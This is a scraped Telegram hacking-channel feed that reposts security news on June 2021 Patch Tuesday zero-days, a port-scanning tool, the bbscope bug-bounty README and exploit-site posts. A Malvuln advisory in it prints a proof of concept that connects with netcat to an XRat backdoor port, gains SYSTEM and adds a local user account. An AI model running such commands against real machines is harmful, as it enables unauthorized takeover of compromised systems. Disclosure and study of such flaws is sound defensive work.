Hacking Articles Tips Tricks Videos Tutorials
468 subscribers
65.7K photos
15 videos
157 files
132K links
Exploit
Pentesting
Hacking
Red Team
Blue Team
Kali Linux
Bug Bounty
Black Hat
Cyber security etc

@Hacking_Video
@Hacking_attack
Download Telegram
Hacking Articles Tips Tricks Videos Tutorials
nt. CVSS 8.4 * CVE-2021-33742 – Windows MSHTML Platform Remote Code Execution Vulnerability. Rating: Critical. CVSS 7.5 * CVE-2021-31199 – Microsoft Enhanced Cryptographic Provider Elevation of Privilege Vulnerability. Rating: Important. CVSS 5.2 * CVE-2021…
vulnerability in Chrome and Chromium browsers that allows attackers to exploit the Chrome renderer process (the processes that are responsible for what happens inside users’ tabs).
Kaspersky experts did find and analyze the second exploit, however: An elevation of privilege exploit that exploits two distinct vulnerabilities in the Microsoft Windows OS kernel: CVE-2021-31955 and CVE-2021-31956. The CVE-2021-31955 bug “is affiliated with SuperFetch, a feature first introduced in Windows Vista that aims to reduce software loading times by pre-loading commonly used applications into memory,” they explained.

The second flaw, CVE-2021-31956, is an Elevation of Privilege vulnerability and heap-based buffer overflow. Kaspersky said that attackers used this vulnerability alongside Windows Notification Facility (WNF) “to create arbitrary memory read/write primitives and execute malware modules with system privileges.”

“Once the attackers have used both the Chrome and Windows exploits to gain a foothold in the targeted system, the stager module downloads and executes a more complex malware dropper from a remote server,” they continued. “This dropper then installs two executables, which pretend to be legitimate files belonging to Microsoft Windows OS. The second of these two executables is a remote shell module, which is able to download and upload files, create processes, sleep for certain periods of time, and delete itself from the infected system.”

Boris Larin, senior security researcher with Kaspersky’s Global Research and Analysis Team (GReAT), said that the team hasn’t been able to link these highly targeted attacks to any known threat actor: Hence the name PuzzleMaker and the determination to closely monitor the security landscape “for future activity or new insights about this group,” he was quoted as saying in the press release.

If the current trend is any indication, expect to see more of the same, Larin said. “Overall, of late, we’ve been seeing several waves of high-profile threat activity being driven by zero-day exploits,” he said. “It’s a reminder that zero days continue to be the most effective method for infecting targets. Now that these vulnerabilities have been made publicly known, it’s possible that we’ll see an increase of their usage in attacks by this and other threat actors. That means it’s very important for users to download the latest patch from Microsoft as soon as possible.” CVE-2021-31199/CVE-2021-31201The two Enhanced Cryptographic Provider Elevation of Privilege vulnerabilities are linked to the Adobe Reader bug that came under active attack last month (CVE-2021-28550), ZDI explained. “It’s common to see privilege escalation paired with code execution bugs, and it seems these two vulnerabilities were the privilege escalation part of those exploits,” he explained. “It is a bit unusual to see a delay between patch availability between the different parts of an active attack, but good to see these holes now getting closed.” CVE-2021-33739Breen noted that privilege escalation vulnerabilities such as this one in the Microsoft DWM Core Library are just as valuable to attackers as RCEs. “Once they have gained an initial foothold, they can move laterally across the network and uncover further ways to escalate to system or domain-level access,” he said. “This can be hugely damaging in the event of ransomware attacks, where high privileges can enable the attackers to stop or destroy backups and other security tools.”
Source: threatpost.com (Click Link)Recent News* https://www.blackhatethicalhacking.com/wp-content/uploads/2021/06/Untitled-design-1-1-90x90.png RockYou2021: largest password compilation of all time leaked online – 8.4 billion entries17 hours ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2021/06/microsoft-exploit-90x90.jpg Windows Container Malware Targets Kubernetes Clusters1 day ago
* https://www.blackhatethicalhacking[...]

___________________________
@hacking_Attack
@Hacking_Video
Hacking Articles Tips Tricks Videos Tutorials
vulnerability in Chrome and Chromium browsers that allows attackers to exploit the Chrome renderer process (the processes that are responsible for what happens inside users’ tabs). Kaspersky experts did find and analyze the second exploit, however: An elevation…
.com/wp-content/uploads/2021/06/1_6QWMn0DApM4jmbubKuCmNA-90x90.png GitHub’s new policies allow removal of PoC exploits used in attacks2 days ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2021/06/Untitled-design-2-90x90.png Google PPC Ads Used to Deliver Infostealers5 days ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2021/06/Untitled-design-1-90x90.png Researchers Uncover Hacking Operations Targeting Government Entities in South Korea6 days ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2021/06/ransomware-payment-90x90.jpg Cyber-Insurance Fuels Ransomware Payment Surge1 week ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2021/06/banner-2021.2-release-90x90.png Kali Linux 2021.2 Release (Kaboxer, Kali-Tweaks, Bleeding-Edge & Privileged Ports)1 week ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2021/06/ezgif.com-gif-maker-90x90.jpg Cyber attack hits JBS meat works in Australia, North America1 week ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2021/05/HPE-corp-logo-1-90x90.jpg HPE Fixes Critical Zero-Day in Server Management Software1 week ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2021/05/vmware-patch-90x90.jpg VMware Sounds Ransomware Alarm Over Critical Severity Bug2 weeks ago
The post Microsoft Patch Tuesday Fixes 6 In-The-Wild Exploits, 50 Flaws first appeared on Black Hat Ethical Hacking.

___________________________
@hacking_Attack
@Hacking_Video
Hacking Articles Tips Tricks Videos Tutorials
Photo
Kali Linux Tutorials
DivideAndScan : Divide Full Port Scan Results And Use It For Targeted Nmap Runs

DivideAndScan is used to efficiently automate port scanning routine by splitting it into 3 phases: Discover open ports for a bunch of targets. Run Nmap individually for each target with version grabbing and NSE actions. Merge the results into a single Nmap report (different formats available). For the 1st phase a fast port scanner is intended to […]

The post DivideAndScan : Divide Full Port Scan Results And Use It For Targeted Nmap Runs appeared first on Kali Linux Tutorials.

___________________________
@hacking_Attack
@Hacking_Video
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
همه چیز درباره رات اندروید برای هک گوشی های اندرویدی

https://cdn-images-1.medium.com/max/600/1*dNd9Tx46q6hEvDozX-ogSw.jpeg
رات اندروید چیست؟ Android Rat چگونه در گوشی های اندرویدی اجرا می شود؟ راه های جلوگیری از وارد شدن برنامه های رات اندرویدی به گوشی چیست؟…

Continue reading on Medium »
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Interdimensional Internet HackTheBox writeup

https://cdn-images-1.medium.com/max/600/1*0YXLpyRsBa49DOcV96Zc5A.png
This CTF is ranked as medium with a user rating of it being a brain-f*ck. I enjoyed this CTF and in hopes of helping/teaching others the…

Continue reading on Medium »
hacking: security in practice
Fridge improvements

How would I go about trying to reprogram my fridge to let me dispense water from the left door (where the water and ice dispenser is) when it is closed and not worry about whether the right door is open or closed? At the current moment, both doors need to be closed for any function of the dispenser to work.

After finding the model number and buying the right connector to interface with it now what? What language are fridges programmed in and how do I go about debugging the code to find the code for the door? Anyone tinkered with their fridge?

submitted by /u/DarkMonkey98
[link] [comments]

___________________________
@hacking_Attack
@Hacking_Video
Bbscope - Scope Gathering Tool For HackerOne, Bugcrowd, And Intigriti!
http://www.kitploit.com/2021/06/bbscope-scope-gathering-tool-for.html
The ultimate scope gathering (https://www.kitploit.com/search/label/Gathering) tool for HackerOne, Bugcrowd, and Intigriti (https://www.kitploit.com/search/label/Intigriti) by sw33tLie. Need to grep all the large scope domains that you've got on your bug bounty platforms? This is the right tool for the job.
What about getting a list of android apps that you are allowed to test? We've got you covered as well. Reverse engineering god? No worries, you can get a list of binaries to analyze too :)
Installation
Make sure you've a recent version of the Go compiler installed on your system. Then just run: GO111MODULE=on go get -u github.com/sw33tLie/bbscope

Usage
">bbscope (h1|bc|it) -t
How to get the session token: HackerOne: login, then grab the __Host-session cookie Bugcrowd: login, then grab the _crowdcontrol_session cookie Intigriti: login, then intercept (https://www.kitploit.com/search/label/Intercept) a request to api.intigriti.com and look for the Authentication: Bearer XXX header. XXX is your token Remember that you can use the --help flag to get a description for all flags.
Examples
Below you'll find some example commands. Keep in mind that all of them work with Bugcrowd and Intigriti subcommands (bc and it) as well, not just with h1.
Print all in-scope targets from all your HackerOne programs that offer rewards
-b -o t ">bbscope h1 -t -b -o t
The output will look like this: app.example.com
*.user.example.com
*.demo.com
www.something.com

Print all in-scope targets from all your private HackerOne programs that offer rewards
-b -p -o t ">bbscope h1 -t -b -p -o t

Print all in-scope Android APKs from all your HackerOne programs
-o t -c android ">bbscope h1 -t -o t -c android

Print all in-scope targets from all your HackerOne programs with extra data
-o tdu -d ", " '>bbscope h1 -t -o tdu -d ", "
This will print a list of in-scope targets from all your HackerOne programs (including public ones and VDPs) but, on the same line, it will also print the target description (when available) and the program's URL. It might look like this: something.com, Something's main website, https://hackerone.com/something
*.demo.com, All assets owned by Demo are in scope, https://hackerone.com/demo

Get program URLs for your HackerOne private programs
-o u -p | sort -u ">bbscope h1 -t -o u -p | sort -u
You'll get a list like this: https://hackerone.com/demo
https://hackerone.com/something

Beware of scope oddities
In an ideal world, all programs use the in-scope table in the same way to clearly show what's in scope, and make parsing easy. Unfortunately, that's not always the case. Sometimes assets are assigned the wrong category. For example, if you're going after URLs using the -c url, double checking using -c all is often a good idea. Other times, on HackerOne, you will find targets written in the scope description, instead of in the scope title. A few programs that do this are: Verizon Media (https://hackerone.com/verizonmedia/?type=team) Mail.ru (https://hackerone.com/mailru) If you want to grep those URLs as well, you MUST include d in the printing options flag (-o). Sometimes it gets even stranger: Spotify (https://hackerone.com/spotify) uses titles of the in-scope table to list wildcards, but then lists the actually in-scope subdomains (https://www.kitploit.com/search/label/Subdomains) in the targets description. Human minds are weird and this tool does not attempt to parse nonsense, you'll have to do that manually (or bother people that can make this change, maybe?).
Thanks
0xatul (https://github.com/0xatul) JoeMilian (https://github.com/JoeMilian) ByteOven (https://github.com/ByteOven) dee-see (https://gitlab.com/dee-see) jub0bs (https://jub0bs.com/)

Download Bbscope (https://github.com/sw33tLie/bbscope)
Bbscope - Scope Gathering Tool For HackerOne, Bugcrowd, And Intigriti!

The ultimate scope gathering tool for HackerOne, Bugcrowd, and Intigriti by sw33tLie. Need to grep all the large scope domains that you've got on your bug bounty platforms? This is the right tool for the job. What about getting a list of android apps that you are allowed to test? We've got you covered as well. Reverse engineering god? No worries, you can get a list of binaries to analyze too :) Installation Make sure you've a recent version of the Go compiler installed on your system. Then just run: GO111MODULE=on go get -u github.com/sw33tLie/bbscope Usage bbscope (h1|bc|it) -t <session-token> <other-flags> How to get the session token: HackerOne: login, then grab the _Host-session cookie Bugcrowd: login, then grab the _crowdcontrol_session cookie Intigriti: login, then intercept a request to api.intigriti.com and look for the Authentication: Bearer XXX header. XXX is your token Remember that you can use the --help flag to get a description for all flags. Examples Below you'll find some example commands. Keep in mind that all of them work with Bugcrowd and Intigriti subcommands (bc and it) as well, not just with h1. Print all in-scope targets from all your HackerOne programs that offer rewards bbscope h1 -t <YOUR_TOKEN> -b -o t The output will look like this: app.example.com*.user.example.com*.demo.comwww.something.com Print all in-scope targets from all your private HackerOne programs that offer rewards bbscope h1 -t <YOUR_TOKEN> -b -p -o t Print all in-scope Android APKs from all your HackerOne programs bbscope h1 -t <YOUR_TOKEN> -o t -c android Print all in-scope targets from all your HackerOne programs with extra data bbscope h1 -t <YOUR_TOKEN> -o tdu -d ", " This will print a list of in-scope targets from all your HackerOne programs (including public ones and VDPs) but, on the same line, it will also print the target description (when available) and the program's URL. It might look like this: something.com, Something's main website, https://hackerone.com/something*.demo.com, All assets owned by Demo are in scope, https://hackerone.com/demo Get program URLs for your HackerOne private programs bbscope h1 -t <YOUR_TOKEN> -o u -p | sort -u You'll get a list like this: https://hackerone.com/demohttps://hackerone.com/something Beware of scope oddities In an ideal world, all programs use the in-scope table in the same way to clearly show what's in scope, and make parsing easy. Unfortunately, that's not always the case. Sometimes assets are assigned the wrong category. For example, if you're going after URLs using the -c url, double checking using -c all is often a good idea. Other times, on HackerOne, you will find targets written in the scope description, instead of in the scope title. A few programs that do this are: Verizon Media Mail.ru If you want to grep those URLs as well, you MUST include d in the printing options flag (-o). Sometimes it gets even stranger: Spotify uses titles of the in-scope table to list wildcards, but then lists the actually in-scope subdomains in the targets description. Human minds are weird and this tool does not attempt to parse nonsense, you'll have to do that manually (or bother people that can make this change, maybe?). Thanks 0xatul JoeMilian ByteOven dee-see jub0bs Download Bbscope
Read more...
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Backdoor.Win32.XRat.d Code Execution

https://4.bp.blogspot.com/-slZrAXCcTc4/WWlvSkUdx-I/AAAAAAAAINc/GD9pE2wpupUfP-XcYlxrz5jw2m91dZTOgCLcBGAs/s1600/h39.png
Backdoor.Win32.XRat.d malware suffers from a code execution vulnerability.

MD5 | ad2b83a2b4643cd5bab9e2b00a386821

Download
Discovery / credits: Malvuln - malvuln.com (c) 2021
Original source: https://malvuln.com/advisory/dc77b126b205b0f671e505766c607ef1.txt
Contact: malvuln13@gmail.com
Media: twitter.com/malvuln

Threat: Backdoor.Win32.XRat.d
Vulnerability: Unauthenticated Remote Command Execution
Description: XRat malware runs with SYSTEM integrity and listens on TCP port 20888. Third-party attackers who can reach the system can connect, switch to DOS prompt mode and run any OS commands re-compromising the already infected system.
Type: PE32
MD5: dc77b126b205b0f671e505766c607ef1
Vuln ID: MVID-2021-0242
Dropped files: svhost.exe
Disclosure: 06/08/2021

Exploit/PoC:
nc64.exe 192.168.18.127 20888
"X-Rat System Console" v2.0

Status Ready, Client: 192.168.18.130:43857

[DESKTOP-2C4IRJO@C:\WINDOWS\system32]#DOS

Microsoft Windows [Version 10.0.16299.309]
(c) 2017 Microsoft Corporation. All rights reserved.

C:\WINDOWS\system32>whoami
nt authority\system

C:\WINDOWS\system32>net user hyp3rlinx "" /add
The command completed successfully.
Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Source:packetstormsecurity.com
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Intelbras Router RF 301K Cross Site Request Forgery

https://3.bp.blogspot.com/-DuI_c3FaBwQ/WWlvaHZ97uI/AAAAAAAAIO8/N3071iSnuSkvxUt6NQQ_hoJeYx39DTurQCLcBGAs/s1600/h61.png
Intelbras Router RF 301K with firmware versions 1.1.2 through 1.1.5 suffer from a cross site request forgery vulnerability.

MD5 | 51d204bdd79bd9734467954542910a7b

Download
# Exploit Title: Intelbras Router RF 301K - 'DNS Hijacking' Cross-Site Request Forgery (CSRF)
# Date: 01/05/2021
# Exploit Author: Rodolfo Mariano
# Version: Firmware 1.1.2-1.1.5
# CVE: 2021-32403

# Exploit Code:

Source:packetstormsecurity.com

___________________________
@hacking_Attack
@Hacking_Video